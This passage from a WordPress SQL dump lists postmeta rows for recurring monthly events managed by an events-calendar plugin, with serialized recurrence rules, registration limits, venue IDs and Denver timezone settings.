ventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118757,262917,'_RTECwhoCanRegister','any'),(118758,262917,'_RTEClimitRegistrations','0'),(118759,262917,'_RTECmaxRegistrations','30'),(118760,262917,'boldgrid_hide_page_title','0'),(118761,262917,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118799,262953,'_EventEndDate','2021-01-10 10:15:00'),(118755,262917,'_RTECregistrationsDisabled','1'),(118756,262917,'_RTECdeadlineType','start'),(118754,262917,'_EventOrigin','events-calendar'),(118762,262917,'_EventShowMapLink','1'),(118763,262917,'_EventShowMap','1'),(118764,262917,'_EventVenueID','262507'),(118765,262917,'_EventCurrencySymbol',''),(118766,262917,'_EventCurrencyPosition','prefix'),(118767,262917,'_EventCost',''),(118768,262917,'_EventURL',''),(118769,262917,'_EventTimezone','America/Denver'),(118771,262917,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118751,262917,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118058,262918,'_EventStartDate','2021-10-03 09:00:00'),(118934,262957,'_EventCurrencyPosition','prefix'),(118059,262918,'_EventStartDateUTC','2021-10-03 15:00:00'),(118060,262918,'_EventEndDate','2021-10-03 10:15:00'),(118061,262918,'_EventEndDateUTC','2021-10-03 16:15:00'),(118062,262918,'_EventDuration','4500'),(118803,262953,'protect_children',''),(118797,262953,'_EventStartDate','2021-01-10 09:00:00'),(118804,262953,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(118774,262918,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118777,262918,'_RTECdeadlineType','start'),(118778,262918,'_RTECwhoCanRegister','any'),(118779,262918,'_RTEClimitRegistrations','0'),(118780,262918,'_RTECmaxRegistrations','30'),(118781,262918,'boldgrid_hide_page_title','0'),(118782,262918,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118776,262918,'_RTECregistrationsDisabled','1'),(118775,262918,'_EventOrigin','events-calendar'),(118783,262918,'_EventShowMapLink','1'),(118784,262918,'_EventShowMap','1'),(118785,262918,'_EventVenueID','262507'),(118786,262918,'_EventCurrencySymbol',''),(118787,262918,'_EventCurrencyPosition','prefix'),(118788,262918,'_EventCost',''),(118789,262918,'_EventURL',''),(118790,262918,'_EventTimezone','America/Denver'),(118792,262918,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118090,262919,'_RTECdeadlineType','start'),(118091,262919,'_RTECwhoCanRegister','any'),(118092,262919,'_RTEClimitRegistrations','0'),(118093,262919,'_RTECmaxRegistrations','30'),(118094,262919,'boldgrid_hide_page_title','0'),(121019,263189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:25:\"2020/12/machu-pichu-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"machu-pichu-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"machu-pichu-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"machu-pichu-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121018,263189,'_wp_attached_file','2020/12/machu-pichu-1.jpg'),(118108,262919,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118109,262919,'_EventShowMapLink','1'),(118110,262919,'_EventShowMap','1'),(118111,262919,'_EventVenueID','262507'),(118112,262919,'_EventStartDate','2020-12-13 09:00:00'),(118113,262919,'_EventEndDate','2020-12-13 10:15:00'),(118114,262919,'_EventStartDateUTC','2020-12-13 16:00:00'),(118115,262919,'_EventEndDateUTC','2020-12-13 17:15:00'),(118116,262919,'_EventDuration','4500'),(118117,262919,'_EventCurrencySymbol',''),(118118,262919,'_EventCurrencyPosition','prefix'),(118119,262919,'_EventCost',''),(118120,262919,'_EventURL',''),(118121,262919,'_EventTimezone','America/Denver'),(118122,262919,'_EventTimezoneAbbr','MST'),(128871,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128894,263459,'_EventStartDate','2021-02-08 15:00:00'),(118689,262914,'protect_children',''),(118137,262871,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(118142,262871,'_RTECregistrationsDisabled','1'),(118143,262871,'_RTECdeadlineType','start'),(118144,262871,'_RTECwhoCanRegister','any'),(118145,262871,'_RTEClimitRegistrations','0'),(118140,262871,'_EventOrigin','events-calendar'),(118148,262871,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118149,262871,'_EventShowMapLink','1'),(118150,262871,'_EventShowMap','1'),(118151,262871,'_EventVenueID','262507'),(118152,262871,'_EventCurrencySymbol',''),(118153,262871,'_EventCurrencyPosition','prefix'),(118154,262871,'_EventCost',''),(118155,262871,'_EventURL',''),(118156,262871,'_EventTimezone','America/Denver'),(118157,262871,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118158,262872,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(118179,262873,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(118184,262873,'_RTECregistrationsDisabled','1'),(118185,262873,'_RTECdeadlineType','start'),(118186,262873,'_RTECwhoCanRegister','any'),(118182,262873,'_EventOrigin','events-calendar'),(118191,262873,'_EventShowMapLink','1'),(118192,262873,'_EventShowMap','1'),(118193,262873,'_EventVenueID','262507'),(118194,262873,'_EventCurrencySymbol',''),(118195,262873,'_EventCurrencyPosition','prefix'),(118196,262873,'_EventCost',''),(118197,262873,'_EventURL',''),(118198,262873,'_EventTimezone','America/Denver'),(118199,262873,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118200,262874,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(118205,262874,'_RTECregistrationsDisabled','1'),(118206,262874,'_RTECdeadlineType','start'),(118207,262874,'_RTECwhoCanRegister','any'),(118208,262874,'_RTEClimitRegistrations','0'),(118203,262874,'_EventOrigin','events-calendar'),(118211,262874,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118212,262874,'_EventShowMapLink','1'),(118213,262874,'_EventShowMap','1'),(118214,262874,'_EventVenueID','262507'),(118215,262874,'_EventCurrencySymbol',''),(118216,262874,'_EventCurrencyPosition','prefix'),(118217,262874,'_EventCost',''),(118218,262874,'_EventURL',''),(118219,262874,'_EventTimezone','America/Denver'),(118220,262874,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118985,262959,'_RTECmaxRegistrations','30'),(118986,262959,'boldgrid_hide_page_title','0'),(118974,262959,'_EventEndDateUTC','2021-07-11 16:15:00'),(118975,262959,'_EventDuration','4500'),(118976,262959,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118950,262958,'_EventOrigin','events-calendar'),(118808,262953,'_RTECdeadlineType','start'),(118732,262916,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118004,262916,'_EventDuration','4500'),(118817,262953,'_EventCurrencySymbol',''),(118805,262953,'_EventOrigin','events-calendar'),(118809,262953,'_RTECwhoCanRegister','any'),(118810,262953,'_RTEClimitRegistrations','0'),(118811,262953,'_RTECmaxRegistrations','30'),(118812,262953,'boldgrid_hide_page_title','0'),(118813,262953,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119257,262968,'_EventTimezone','America/Denver'),(119276,262969,'_RTECmaxRegistrations','30'),(119256,262968,'_EventURL',''),(119249,262968,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119186,262966,'_RTECdeadlineType','start'),(119183,262966,'_EventOrigin','events-calendar'),(119191,262966,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119192,262966,'_EventShowMapLink','1'),(119193,262966,'_EventShowMap','1'),(119194,262966,'_EventVenueID','262507'),(119195,262966,'_EventCurrencySymbol',''),(119196,262966,'_EventCurrencyPosition','prefix'),(119197,262966,'_EventCost',''),(119198,262966,'_EventURL',''),(119199,262966,'_EventTimezone','America/Denver'),(119200,262966,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8